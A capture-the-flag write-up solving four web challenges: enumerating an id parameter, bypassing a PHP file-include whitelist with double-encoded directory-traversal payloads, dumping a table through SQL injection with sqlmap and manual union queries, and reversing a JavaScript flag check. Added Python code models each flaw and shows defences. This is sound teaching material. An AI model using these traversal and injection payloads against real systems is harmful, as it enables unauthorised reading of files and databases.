CTF_Web: Attack and Defense World expert zone advanced problems WP (5-8)
2022-06-25 04:30:00 【AFCC_】
Continuously updated
0x05 ics-06
Challenge description: The cloud platform report center collects data from the basic equipment management services, but the data was deleted and only one place still carries traces of the intruder.
Opening the challenge, only the report management page can be clicked, so the answer should be there. The query form is fake, but the URL carries an id parameter. There is no injection: whatever you enter, no error comes back, and changing the id returns the same page for every value. The flag must therefore be hidden somewhere in the id space, so brute-force the id number.
Use Burp to capture the request and test the id parameter, generating id numbers from 1 to 10000.
At id=2333 the response differs, with status code 200.
Find the flag.
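The id sweep above is just as visible from the server side. As an added example (not part of the original writeup, and not from the challenge itself), the Python below parses a few constructed combined-format access-log lines and flags two things a defender would want: a client that requests many distinct id values inside one minute, and the single id whose response size differs from the rest, which is exactly the signal the writeup used to spot id=2333. The log lines, IPs and sizes are all made up; the threshold of 3 distinct ids per minute is an assumption.

```python
import re
from collections import Counter, defaultdict

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jun/2022:04:30:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 812
10.0.0.5 - - [25/Jun/2022:04:30:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 812
10.0.0.5 - - [25/Jun/2022:04:30:02 +0000] "GET /index.php?id=3 HTTP/1.1" 200 812
10.0.0.5 - - [25/Jun/2022:04:30:02 +0000] "GET /index.php?id=4 HTTP/1.1" 200 812
10.0.0.5 - - [25/Jun/2022:04:30:03 +0000] "GET /index.php?id=2333 HTTP/1.1" 200 1377
10.0.0.9 - - [25/Jun/2022:04:30:03 +0000] "GET /index.php?id=7 HTTP/1.1" 200 812
10.0.0.9 - - [25/Jun/2022:04:31:10 +0000] "GET /index.php?id=7 HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
ID_RE = re.compile(r'[?&]id=(\d+)')


def parse(line):
    """Return a dict with ip, minute bucket, id, status and size, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    idm = ID_RE.search(m['path'])
    return {
        'ip': m['ip'],
        'minute': m['ts'][:17],          # "25/Jun/2022:04:30" -> one-minute bucket
        'id': int(idm.group(1)) if idm else None,
        'status': int(m['status']),
        'size': int(m['size']),
    }


def find_enumerators(lines, threshold=3):
    """(ip, minute) -> number of distinct ids, for buckets at or above the threshold.
    A single client walking through many ids in one minute is the enumeration pattern."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec and rec['id'] is not None:
            seen[(rec['ip'], rec['minute'])].add(rec['id'])
    return {key: len(ids) for key, ids in seen.items() if len(ids) >= threshold}


def find_size_outliers(lines):
    """id -> response size for successful responses whose size differs from the
    most common one. When every id renders the same page, the odd one out is the
    record that actually exists and was exposed."""
    sizes = {}
    for line in lines:
        rec = parse(line)
        if rec and rec['id'] is not None and rec['status'] == 200:
            sizes[rec['id']] = rec['size']
    if not sizes:
        return {}
    usual = Counter(sizes.values()).most_common(1)[0][0]
    return {i: s for i, s in sizes.items() if s != usual}


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("enumerating clients:", find_enumerators(lines))
    print("unusual responses:", find_size_outliers(lines))
```

The same two signals map directly onto mitigations: rate-limit or alert on distinct-id counts per client, and make sure a "not found" id renders a genuinely different response (404) so that the existence of a record is not leaked purely through response size.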
0x06 warmup
Challenge description: from HCTF 2018.
Check the page source and find source.php; open it to view the code.
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
The key part is if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])): as long as the incoming file parameter is non-empty, is a string, and satisfies checkFile, it gets included.
Inside checkFile there are several functions that deserve attention:
in_array($page, $whitelist) : tests whether page is one of the values in the whitelist
mb_substr($page, 0, mb_strpos($page . '?', '?')) : takes the content before the specified position
mb_strpos($page . '?', '?') : returns the position where the question mark first appears
That is, the part of the file name before the question mark must be in the whitelist.
Visit index.php?file=hint.php to get the hint.
Now we need the check function to return true. There are two places where it can do so; one is index.php?file=hint.php?/../../../../ffffllllaaaagggg
or index.php?file=hint.php%3f/../../../../ffffllllaaaagggg
These two payloads are equivalent, because %3f is URL-decoded once automatically before the parameter reaches PHP. Both pass the second whitelist test and never enter the urldecode part, as the local reproduction also shows.
The second check returns true, but the include then fails: no file with that name exists, and the directory traversal also fails. Many other writeups differ here; maybe it is environmental?
Here is the third payload: index.php?file=hint.php%253f/../../../../ffffllllaaaagggg
This one makes the third check return true: after the single automatic decode the string still contains %3f rather than ?, so the second check finds no question mark and falls through to the urldecode branch. The local return shows this too.
Then the include performs the directory traversal successfully. In my local reproduction, using ? directly as the separator did not work, and I don't know why so many writeups use ? directly (it should be because the challenge environment is Linux). Locally the traversal only happens when the incoming file parameter is double-encoded.
-- 8.28 update: the reason --
The reason for the payload difference should be that Windows cannot create a file name containing ?, while Linux can, so on Windows the include errors out immediately. The challenge environment is presumably Linux, which is why the payloads in the other writeups all work...
So many payloads work: Linux is not sensitive to it.
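To make the three-stage check concrete, here is an added Python model of emmm::checkFile (my own re-implementation for this writeup, not the challenge's PHP): it reports which stage accepted a value, shows that the included path is the raw parameter rather than the whitelisted name, and places a hardened lookup next to it. Assumptions: the value passed in is what PHP sees after the web server's single URL decode (so the %253f payload arrives as %3f), urllib's unquote_plus stands in for PHP's urldecode, and the payload strings are the ones from the text above.

```python
from urllib.parse import unquote_plus

WHITELIST = {"source": "source.php", "hint": "hint.php"}


def before_question_mark(s):
    # mb_substr($s, 0, mb_strpos($s . '?', '?')): everything before the first '?',
    # or the whole string when it contains none
    return s[: (s + '?').index('?')]


def check_file(page):
    """Model of emmm::checkFile. Returns the number of the stage that accepted
    the value (1, 2 or 3), or 0 when it is rejected."""
    if not isinstance(page, str) or page == "":
        return 0
    if page in WHITELIST.values():                              # stage 1: exact match
        return 1
    if before_question_mark(page) in WHITELIST.values():        # stage 2: prefix before '?'
        return 2
    decoded = unquote_plus(page)                                # stage 3: urldecode, then prefix
    if before_question_mark(decoded) in WHITELIST.values():
        return 3
    return 0


def included_path(page):
    """What `include $_REQUEST['file']` actually receives: the untouched parameter,
    not the prefix that the check inspected. This gap is the vulnerability."""
    return page if check_file(page) else None


def safe_resolve(page):
    """Hardened variant: treat the parameter as a key into the whitelist and
    include only the mapped filename. Nothing user-controlled reaches include."""
    return WHITELIST.get(page)


if __name__ == "__main__":
    # constructed inputs mirroring the writeup's payloads, as PHP receives them
    for p in ["hint.php",
              "hint.php?/../../../../ffffllllaaaagggg",
              "hint.php%3f/../../../../ffffllllaaaagggg",
              "ffffllllaaaagggg"]:
        print(f"{p!r:50} stage={check_file(p)} include={included_path(p)!r} "
              f"safe={safe_resolve(p)!r}")
```

The fix is not a better prefix check: any check that looks at a transformed copy of the string while include gets the original can be split. Mapping a short key to a fixed filename removes the transformation entirely.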

0x07 NewsCenter
Challenge description: if the challenge environment reports an error, wait a moment and refresh.

Querying 1 and 1' returns different pages, which indicates an injection vulnerability.
You can capture the request, save it as a.txt, and run sqlmap -r a.txt -T secret_table -C fl4g --dump in one shot to get the result.

Let's also test it by hand to check our understanding.
First use order by X to determine the number of fields: order by 4 returns an error, so there are 3 fields.
Then 1' union select 1,2,3 # uses a union query to determine the echo positions.

The echo appears in the last two fields. Replace them with different expressions to query sensitive information:
' union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # queries all table names.
' union select 1,2,column_name from information_schema.columns where table_name="secret_table" # queries the fields of that table.
' union select 1,2,fl4g from secret_table# queries the fl4g value.
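The manual steps above (order by probing, then a union into the echoed columns) can be reproduced offline against a tiny in-memory database, which is also the cleanest way to show why a parameterised query closes the hole. The Python below is an added example written for this writeup, not the challenge's backend. It is built on sqlite3, so two details differ from the MySQL target: the comment marker is -- rather than #, and there is no information_schema (sqlite_master is the analogue). The news and secret_table tables, the flag string and the column names are constructed.

```python
import sqlite3

FLAG = "flag{constructed-sample}"   # made-up value, not the challenge's flag


def make_db():
    """In-memory database with a 3-column news table and a secret table."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE news(id INTEGER, title TEXT, content TEXT);
        INSERT INTO news VALUES (1, 'hello', 'first story'), (2, 'other', 'second story');
        CREATE TABLE secret_table(id INTEGER, fl4g TEXT);
        INSERT INTO secret_table VALUES (1, '{FLAG}');
    """)
    return con


def search_vulnerable(con, term):
    # String concatenation: a quote in `term` closes the literal and the rest is SQL.
    sql = "SELECT id, title, content FROM news WHERE title LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_safe(con, term):
    # Bound parameter: the driver sends `term` as data, so quotes stay quotes.
    sql = "SELECT id, title, content FROM news WHERE title LIKE ?"
    return con.execute(sql, ("%" + term + "%",)).fetchall()


def count_columns(con, max_cols=10):
    """ORDER BY n probing, generalised from the writeup's single step: the largest n
    that does not raise is the number of columns in the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(con, f"' order by {n}-- ")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def union_exfil(con):
    """The writeup's final union, with the sqlite comment marker."""
    rows = search_vulnerable(con, "' union select 1,2,fl4g from secret_table-- ")
    return [row[2] for row in rows]   # the third column is one of the echoed fields


if __name__ == "__main__":
    con = make_db()
    print("columns:", count_columns(con))
    print("vulnerable search leaks:", union_exfil(con))
    print("same payload through the safe search:",
          search_safe(con, "' union select 1,2,fl4g from secret_table-- "))
```

The vulnerable and safe functions accept identical input; only the second one keeps the user's text on the data side of the query. That is the whole fix, and it is also why sqlmap against the safe version finds nothing.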
0x08 NaNNaNNaNNaN-Batman
Challenge description: tinyctf-2014
The given package contains JavaScript source; after tidying it up, it reads:
function $(){
    var e=document.getElementById("c").value;
    // five conditions on the input: length 16, fixed prefix, fixed suffix, two substrings
    if(e.length==16)
    if(e.match(/^be0f23/)!=null)
    if(e.match(/233ac/)!=null)
    if(e.match(/e98aa$/)!=null)
    if(e.match(/c7be9/)!=null){
        var t=["fl","s_a","i","e}"];
        var n=["a","_h0l","n"];
        var r=["g{","e","_0"];
        var i=["it'","_","n"];
        var s=[t,n,r,i];
        // round-robin over the four arrays, consuming the first element each time
        for(var o=0;o<13;++o){
            document.write(s[o%4][0]);s[o%4].splice(0,1)
        }
    }
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
So the input only has to satisfy the regular expressions above and have length 16: be0f23, 233ac, e98aa, c7be9.
The combined length of those fragments is clearly more than 16, so they must be merged by overlap: be0f233ac is 9 characters and c7be98aa is 8; merging the shared c in the middle gives exactly 16, so the input is be0f233ac7be98aa.
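The merge was done by eye above; the same reasoning can be automated. As an added example (mine, not from the challenge), the Python below encodes the five conditions from the script, tries each ordering of the two floating fragments between the fixed prefix and suffix, joins neighbours on their longest overlap, and keeps only candidates that pass every check. It also replays the round-robin splice loop to recover the string the page would write. Fragment values are those on the page; the greedy longest-overlap join is an assumption of the method (it suffices here, but a general solver would also try shorter overlaps).

```python
import re
from itertools import permutations

LENGTH = 16
PREFIX, SUFFIX = "be0f23", "e98aa"     # anchored by /^be0f23/ and /e98aa$/
ANYWHERE = ["233ac", "c7be9"]           # unanchored /233ac/ and /c7be9/


def passes_checks(e):
    """The same five conditions as the page's JavaScript."""
    return (len(e) == LENGTH
            and re.match(r'^be0f23', e) is not None
            and re.search(r'233ac', e) is not None
            and re.search(r'e98aa$', e) is not None
            and re.search(r'c7be9', e) is not None)


def merge(a, b):
    """Join b onto a using the longest suffix of a that is also a prefix of b."""
    for k in range(min(len(a), len(b)), 0, -1):
        if a.endswith(b[:k]):
            return a + b[k:]
    return a + b


def assemble():
    """Set of 16-character strings obtainable by overlap-merging the fragments in
    some order that satisfies all checks. Expected to contain exactly one answer."""
    found = set()
    for order in permutations(ANYWHERE):
        s = PREFIX
        for frag in list(order) + [SUFFIX]:
            s = merge(s, frag)
        if passes_checks(s):
            found.add(s)
    return found


def flag_from_page_script():
    """Replay of the document.write loop: round-robin over four lists, popping the
    first element each time, 13 iterations in total."""
    t = ["fl", "s_a", "i", "e}"]
    n = ["a", "_h0l", "n"]
    r = ["g{", "e", "_0"]
    i = ["it'", "_", "n"]
    s = [t, n, r, i]
    out = []
    for o in range(13):
        out.append(s[o % 4].pop(0))
    return "".join(out)


if __name__ == "__main__":
    print("inputs that pass:", assemble())
    print("page output:", flag_from_page_script())
```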